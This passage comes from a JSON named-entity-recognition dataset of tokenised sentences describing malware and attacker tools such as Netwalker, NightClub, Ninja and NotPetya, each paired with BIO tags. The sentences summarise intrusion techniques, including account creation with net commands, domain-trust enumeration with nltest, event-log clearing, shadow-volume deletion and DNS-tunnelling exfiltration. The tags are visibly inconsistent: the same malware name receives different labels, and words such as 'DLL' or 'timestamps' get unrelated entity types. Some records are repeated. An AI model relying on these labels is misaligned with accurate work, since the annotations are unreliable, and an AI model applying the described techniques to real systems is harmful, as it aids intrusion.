"Neoichor", "can", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Nerex", "drops", "a", "signed", "Microsoft", "DLL", "to", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Nerex", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "download", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Nerex", "creates", "a", "Registry", "subkey", "that", "registers", "a", "new", "service." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nerex", "creates", "a", "Registry", "subkey", "that", "registers", "a", "new", "service." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Net", "commands", "used", "with", "the", "<code>/domain</code>", "flag", "can", "be", "used", "to", "gather", "information", "about", "and", "manipulate", "user", "accounts", "on", "the", "current", "domain." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "user", "username", "\\password", "\\domain</code>", "commands", "in", "Net", "can", "be", "used", "to", "create", "a", "domain", "account." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Commands", "such", "as", "<code>net", "group", "/domain</code>", "can", "be", "used", "in", "Net", "to", "gather", "information", "about", "and", "manipulate", "groups." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Commands", "under", "<code>net", "user</code>", "can", "be", "used", "in", "Net", "to", "gather", "information", "about", "and", "manipulate", "user", "accounts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "The", "<code>net", "user", "username", "\\password</code>", "commands", "in", "Net", "can", "be", "used", "to", "create", "a", "local", "account." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Commands", "such", "as", "<code>net", "group</code>", "and", "<code>net", "localgroup</code>", "can", "be", "used", "in", "Net", "to", "gather", "information", "about", "and", "manipulate", "groups." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "use", "\\\\system\\share", "/delete</code>", "command", "can", "be", "used", "in", "Net", "to", "remove", "an", "established", "connection", "to", "a", "network", "share." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "B-Features", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "view", "\\\\remotesystem</code>", "and", "<code>net", "share</code>", "commands", "in", "Net", "can", "be", "used", "to", "find", "shared", "drives", "and", "directories", "on", "remote", "and", "local", "systems", "respectively." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "accounts</code>", "and", "<code>net", "accounts", "/domain</code>", "commands", "with", "Net", "can", "be", "used", "to", "obtain", "password", "policy", "information." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Commands", "such", "as", "<code>net", "view</code>", "can", "be", "used", "in", "Net", "to", "gather", "information", "about", "available", "remote", "systems." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Lateral", "movement", "can", "be", "done", "with", "Net", "through", "<code>net", "use</code>", "commands", "to", "connect", "to", "the", "on", "remote", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "start</code>", "and", "<code>net", "stop</code>", "commands", "can", "be", "used", "in", "Net", "to", "execute", "or", "stop", "Windows", "services." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Commands", "such", "as", "<code>net", "use</code>", "and", "<code>net", "session</code>", "can", "be", "used", "in", "Net", "to", "gather", "information", "about", "network", "connections", "from", "a", "particular", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "start</code>", "command", "can", "be", "used", "in", "Net", "to", "find", "information", "about", "Windows", "services." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "The", "<code>net", "time</code>", "command", "can", "be", "used", "in", "Net", "to", "determine", "the", "local", "or", "remote", "system", "time." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Net", "Crawler", "uses", "credential", "dumpers", "such", "as", "Mimikatz", "and", "Windows", "Credential", "Editor", "to", "extract", "cached", "credentials", "from", "Windows", "systems." ], "ner_tags": [ "B-Tool", "B-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Net", "Crawler", "uses", "a", "list", "of", "known", "credentials", "gathered", "through", "credential", "dumping", "to", "guess", "passwords", "to", "accounts", "as", "it", "spreads", "throughout", "a", "network." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Net", "Crawler", "uses", "Windows", "admin", "shares", "to", "establish", "authenticated", "sessions", "to", "remote", "systems", "over", "SMB", "as", "part", "of", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Net", "Crawler", "uses", "PsExec", "to", "perform", "remote", "service", "manipulation", "to", "execute", "a", "copy", "of", "itself", "as", "part", "of", "lateral", "movement." ], "ner_tags": [ "B-Tool", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NetTraveler", "reports", "window", "names", "along", "with", "keylogger", "information", "to", "provide", "application", "context." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NetTraveler", "contains", "a", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Netwalker's", "PowerShell", "script", "has", "been", "obfuscated", "with", "multiple", "layers", "including", "base64", "and", "hexadecimal", "encoding", "and", "XOR-encryption,", "as", "well", "as", "obfuscated", "PowerShell", "functions", "and", "variables." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "encrypt", "files", "on", "infected", "machines", "to", "extort", "victims." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker's", "PowerShell", "script", "can", "decode", "and", "decrypt", "multiple", "layers", "of", "obfuscation,", "leading", "to", "the", "Netwalker", "DLL", "being", "loaded", "into", "memory." ], "ner_tags": [ "B-Way", "B-Way", "B-Tool", "O", "B-Features", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "detect", "and", "terminate", "active", "security", "software-related", "processes", "on", "infected", "systems." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Netwalker", "DLL", "has", "been", "injected", "reflectively", "into", "the", "memory", "of", "a", "legitimate", "running", "process." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker's", "DLL", "has", "been", "embedded", "within", "the", "PowerShell", "script", "in", "hex", "format." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Operators", "deploying", "Netwalker", "have", "used", "psexec", "and", "certutil", "to", "retrieve", "the", "Netwalker", "payload." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "delete", "the", "infected", "system's", "Shadow", "Volumes", "to", "prevent", "recovery." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Operators", "deploying", "Netwalker", "have", "used", "psexec", "to", "copy", "the", "Netwalker", "payload", "across", "accessible", "systems." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "add", "the", "following", "registry", "entry:", "<code>HKEY_CURRENT_USER\\SOFTWARE\\{8", "random", "characters}</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "use", "Windows", "API", "functions", "to", "inject", "the", "ransomware", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Netwalker", "has", "been", "written", "in", "PowerShell", "and", "executed", "directly", "in", "memory,", "avoiding", "detection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "detect", "and", "terminate", "active", "security", "software-related", "processes", "on", "infected", "systems." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Operators", "deploying", "Netwalker", "have", "used", "psexec", "and", "certutil", "to", "retrieve", "the", "Netwalker", "payload." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "terminate", "system", "processes", "and", "services,", "some", "of", "which", "relate", "to", "backup", "software." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Netwalker", "can", "determine", "the", "system", "architecture", "it", "is", "running", "on", "to", "choose", "which", "version", "of", "the", "DLL", "to", "use." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Operators", "deploying", "Netwalker", "have", "used", "batch", "scripts", "to", "retrieve", "the", "Netwalker", "payload." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Netwalker", "can", "use", "WMI", "to", "delete", "Shadow", "Volumes." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Nidiran", "can", "download", "and", "execute", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Nidiran", "can", "create", "a", "new", "service", "named", "msamger", "(Microsoft", "Security", "Accounts", "Manager),", "which", "mimics", "the", "legitimate", "Microsoft", "database", "by", "the", "same", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nidiran", "can", "create", "a", "new", "service", "named", "msamger", "(Microsoft", "Security", "Accounts", "Manager)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "`GetForegroundWindow`", "to", "enumerate", "the", "active", "window." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "load", "a", "module", "to", "leverage", "the", "LAME", "encoder", "and", "`mciSendStringW`", "to", "control", "and", "capture", "audio." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "a", "DNS", "tunneling", "plugin", "to", "exfiltrate", "data", "by", "adding", "it", "to", "the", "subdomain", "portion", "of", "a", "DNS", "request." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "B-SamFile", "B-Purp", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "a", "file", "monitor", "to", "steal", "specific", "files", "from", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "SMTP", "and", "DNS", "for", "file", "exfiltration", "and", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "a", "file", "monitor", "to", "identify", ".lnk,", ".doc,", ".docx,", ".xls,", ".xslx,", "and", ".pdf", "files." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "NightClub", "can", "load", "multiple", "additional", "plugins", "on", "an", "infected", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "a", "plugin", "for", "keylogging." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "NightClub", "has", "copied", "captured", "files", "and", "keystrokes", "to", "the", "`%TEMP%`", "directory", "of", "compromised", "hosts." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "emails", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "NightClub", "has", "created", "a", "service", "named", "`WmdmPmSp`", "to", "spoof", "a", "Windows", "Media", "service." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "has", "chosen", "file", "names", "to", "appear", "legitimate", "including", "EsetUpdate-0117583943.exe", "for", "its", "dropper." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Way" ] }, { "tokens": [ "NightClub", "can", "modify", "the", "Registry", "to", "set", "the", "ServiceDLL", "for", "a", "service", "created", "by", "the", "malware", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "use", "multiple", "native", "APIs", "including", "`GetKeyState`,", "`GetForegroundWindow`,", "`GetWindowThreadProcessId`,", "and", "`GetKeyboardLayout`." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "NightClub", "has", "used", "a", "non-standard", "encoding", "in", "DNS", "tunneling", "removing", "any", "`=`", "from", "the", "result", "of", "base64", "encoding,", "and", "replacing", "`/`", "characters", "with", "`-s`", "and", "`+`", "characters", "with", "`-p`." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "NightClub", "can", "obfuscate", "strings", "using", "the", "congruential", "generator", "`(LCG):", "staten+1", "=", "(690069", "×", "staten", "+", "1)", "mod", "232`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "has", "the", "ability", "to", "monitor", "removable", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "NightClub", "has", "the", "ability", "to", "use", "`GetWindowThreadProcessId`", "to", "identify", "the", "process", "behind", "a", "specified", "window." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "load", "a", "module", "to", "call", "`CreateCompatibleDC`", "and", "`GdipSaveImageToStream`", "for", "screen", "capture." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NightClub", "can", "modify", "the", "Creation,", "Access,", "and", "Write", "timestamps", "for", "malicious", "DLLs", "to", "match", "those", "of", "the", "genuine", "Windows", "DLL", "user32.dll." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "B-Features", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "NightClub", "has", "created", "a", "Windows", "service", "named", "`WmdmPmSp`", "to", "establish", "persistence." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Tool", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Ninja", "loaders", "can", "be", "side-loaded", "with", "legitimate", "and", "signed", "executables", "including", "the", "VLC.exe", "media", "player." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Tool", "O" ] }, { "tokens": [ "Ninja", "has", "the", "ability", "to", "modify", "headers", "and", "URL", "paths", "to", "hide", "malicious", "traffic", "in", "HTTP", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "B-HackOrg", "B-Features", "O", "I-Purp", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "The", "Ninja", "loader", "component", "can", "decrypt", "and", "decompress", "the", "payload." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "B-Features", "O", "B-HackOrg", "I-Features", "O" ] }, { "tokens": [ "The", "Ninja", "payload", "is", "XOR", "encrypted", "and", "compressed.", "Ninja", "has", "also", "XORed", "its", "configuration", "data", "with", "a", "constant", "value", "of", "`0xAA`", "and", "compressed", "it", "with", "the", "LZSS", "algorithm." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "store", "its", "final", "payload", "in", "the", "Registry", "under", "`$HKLM\\SOFTWARE\\Classes\\Interface\\`", "encrypted", "with", "a", "dynamically", "generated", "key", "based", "on", "the", "drive’s", "serial", "number." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "has", "the", "ability", "to", "enumerate", "directory", "content." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Ninja", "can", "use", "pipes", "to", "redirect", "the", "standard", "input", "and", "the", "standard", "output." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "proxy", "C2", "communications", "including", "to", "and", "from", "internal", "agents", "without", "internet", "connectivity." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "has", "gained", "execution", "through", "victims", "opening", "malicious", "executable", "files", "embedded", "in", "zip", "archives." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "has", "used", "legitimate", "looking", "filenames", "for", "its", "loader", "including", "update.dll", "and", "x64.dll." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Ninja", "has", "the", "ability", "to", "use", "a", "proxy", "chain", "with", "up", "to", "255", "hops", "when", "using", "TCP." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "Ninja", "loader", "can", "call", "Windows", "APIs", "for", "discovery,", "process", "injection,", "and", "payload", "decryption." ], "ner_tags": [ "O", "I-SamFile", "B-SecTeam", "O", "O", "B-Features", "O", "O", "B-Features", "I-Features", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Ninja", "can", "forward", "TCP", "packets", "between", "the", "C2", "and", "a", "remote", "host." ], "ner_tags": [ "B-HackOrg", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "encode", "C2", "communications", "with", "a", "base64", "algorithm", "using", "a", "custom", "alphabet." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Ninja", "can", "enumerate", "processes", "on", "a", "targeted", "host." ], "ner_tags": [ "B-HackOrg", "O", "B-Purp", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "has", "the", "ability", "to", "inject", "an", "agent", "module", "into", "a", "new", "process", "and", "arbitrary", "shellcode", "into", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "has", "the", "ability", "to", "mimic", "legitimate", "services", "with", "customized", "HTTP", "URL", "paths", "and", "headers", "to", "hide", "malicious", "traffic." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Ninja", "loader", "components", "can", "be", "executed", "through", "rundll32.exe." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Ninja", "can", "configure", "its", "agent", "to", "work", "only", "in", "specific", "time", "frames." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "has", "been", "distributed", "to", "victims", "via", "the", "messaging", "app", "Telegram." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "XOR", "and", "AES", "encrypt", "C2", "messages." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "obtain", "the", "computer", "name", "and", "information", "on", "the", "OS", "and", "physical", "drives", "from", "targeted", "hosts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "enumerate", "the", "IP", "address", "on", "compromised", "systems." ], "ner_tags": [ "B-HackOrg", "O", "B-SamFile", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "change", "or", "create", "the", "last", "access", "or", "write", "times." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Ninja", "can", "create", "the", "services", "`httpsvc`", "and", "`w3esvc`", "for", "persistence", "." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nltest", "may", "be", "used", "to", "enumerate", "trusted", "domains", "by", "using", "commands", "such", "as", "<code>nltest", "/domain_trusts</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Nltest", "may", "be", "used", "to", "enumerate", "remote", "domain", "controllers", "using", "options", "such", "as", "<code>/dclist</code>", "and", "<code>/dsgetdc</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "B-Purp", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Nltest", "may", "be", "used", "to", "enumerate", "the", "parent", "domain", "of", "a", "local", "machine", "using", "<code>/parentdomain</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "uses", "<code>wevtutil</code>", "to", "clear", "the", "Windows", "event", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "encrypts", "user", "files", "and", "disk", "structures", "like", "the", "MBR", "with", "2048-bit", "RSA." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "can", "use", "two", "exploits", "in", "SMBv1,", "EternalBlue", "and", "EternalRomance,", "to", "spread", "itself", "to", "other", "remote", "systems", "on", "the", "network." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "searches", "for", "files", "ending", "with", "dozens", "of", "different", "file", "extensions", "prior", "to", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "contains", "a", "modified", "version", "of", "Mimikatz", "to", "help", "gather", "credentials", "that", "are", "later", "used", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "can", "use", "valid", "credentials", "with", "PsExec", "or", "<code>wmic</code>", "to", "spread", "itself", "to", "remote", "systems." ], "ner_tags": [ "B-Way", "O", "I-Way", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "drops", "PsExec", "with", "the", "filename", "dllhost.dat." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "NotPetya", "uses", "<code>rundll32.exe</code>", "to", "install", "itself", "on", "remote", "systems", "when", "accessed", "via", "PsExec", "or", "<code>wmic</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "NotPetya", "can", "use", "PsExec,", "which", "interacts", "with", "the", "<code>ADMIN$</code>", "network", "share", "to", "execute", "commands", "on", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "creates", "a", "task", "to", "reboot", "the", "system", "one", "hour", "after", "infection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "determines", "if", "specific", "antivirus", "programs", "are", "running", "on", "an", "infected", "host", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "can", "use", "PsExec", "to", "help", "propagate", "itself", "across", "a", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", 